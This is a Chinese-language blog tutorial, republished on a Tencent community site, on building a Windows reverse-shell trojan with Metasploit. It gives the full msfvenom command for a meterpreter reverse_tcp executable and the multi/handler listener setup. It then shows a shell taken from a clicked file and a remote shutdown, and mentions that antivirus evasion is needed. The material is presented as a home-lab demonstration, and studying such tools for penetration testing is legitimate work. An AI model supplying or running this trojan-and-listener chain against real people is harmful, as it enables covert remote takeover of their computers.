kali linux之msf离线应用层攻击

大家好,我是许心痕,今天给大家带来的是metasploit渗透测试中的:离线应用层攻击。离线攻击就是用msf生成一个木马让别人去点开木马获取别人电脑的shell,获得shell之后就获得了目标主机的控制权,最简单的就是给人家关机啦(千万不要做坏事哦)!!

好了,开始吧

0x00 准备环境

1、一台装有kali linux系统的主机(或虚拟机)、一台目标主机(这里我使用windows系统)

2、使用ifconfig命令查看本机IP,我的是192.168.64.129

0x01 开始渗透

第一步:先打开终端,输入msfconsole按回车,打开msf环境。

输入msfconsole按回车

第二步:生成木马

这里使用的命令是:msfvenom,让我们看看参数有哪些(百度搜索到的参数)

-p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定

-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, –nopsled 为payload预先指定一个NOP滑动长度

-f, –format 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)

-e, –encoder [encoder] 指定需要使用的encoder(编码器)

-a, –arch 指定payload的目标架构

–platform 指定payload的目标平台

-s, –space 设定有效攻击荷载的最大长度

-b, –bad-chars 设定规避字符集,比如: & #039;\x00\xff& #039;

-i, –iterations 指定payload的编码次数

-c, –add-code 指定一个附加的win32 shellcode文件

-x, –template 指定一个自定义的可执行文件作为模板

-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行

–payload-options 列举payload的标准选项

-o, –out 保存payload

-v, –var-name 指定一个自定义的变量,以确定输出格式

–shellest 最小化生成payload

-h, –help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

好了,现在开始使用参数生成一个木马(以对方的系统是windows系统为例。其他系统请百度):

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.129 LPORT=4444 -f exe > shell.exe (lhost后面跟的是本机ip地址,lport后面跟的是监听端口,一般是4444端口,-f exe指定输出格式exe,生成以shell命名的可执行文件)按回车后就生成了一个木马,可以指定生成路径,默认的路径是home文件夹。生成木马后别急着打开,要先使用msf配置一些东西,看下一步

生成shell为名字的可执行文件exe

第三步:输入use exploit/multi/handler按回车调用模块

进入模块

第四步:输入set PAYLOAD windows/meterpreter/reverse_tcp 设置载荷

设置载荷

第五步:输入show options 查看选项

查看选项

第六步:输入set LHOST 192.168.64.129 按回车设置主机为本机ip。lhost后面跟本机的ip

设置主机

第七步:输入set LPORT 4444 按回车,设置监听端口为4444端口。

设置监听端口为4444

第八步:输入exploit进行攻击,然后就大功告成!!

expolit攻击

0x02 模拟受害者,点击木马

1、以我的物理机(windows 10 系统)为例子,我先把虚拟机生成的木马拖动到物理机上,并进行点击木马操作(注意,虚拟机的kali终端不要关闭,一直保持exploit攻击状态)。

点击木马之后就获得了对方的shell

2、上图中,点击木马之后显示这些信息,就说明我们已经拿到了shell。接下来,我们输入shell按回车。

我们已经进入到物理机的命令提示符

3、看到没有,这个图是不是有点熟悉?哈哈,我们已经进入到windows的cmd命令提示符了,学过电脑的都知道,接下来,嘿嘿,我们使用cmd命令让对方的电脑关机,输入shutdown -s -t 3600按回车,这里我设置为3600秒,因为我还要用物理机写这篇文章,你们可以设置为0秒,瞬间关机。

让对方电脑在60分钟后关机

4、好了,就写到这里了,我们先把物理机取消关机状态。输入shutdown -a

取消关机

注意事项:因为生成的木马会被360等杀毒软件检测到并拦截(测试前请关闭杀毒软件),所以还需要进行免杀操作,这里我就不演示了。这就是msf中的离线应用层攻击。想进一步了解的话大家可以去百度哦!

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180629A0OY2P00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券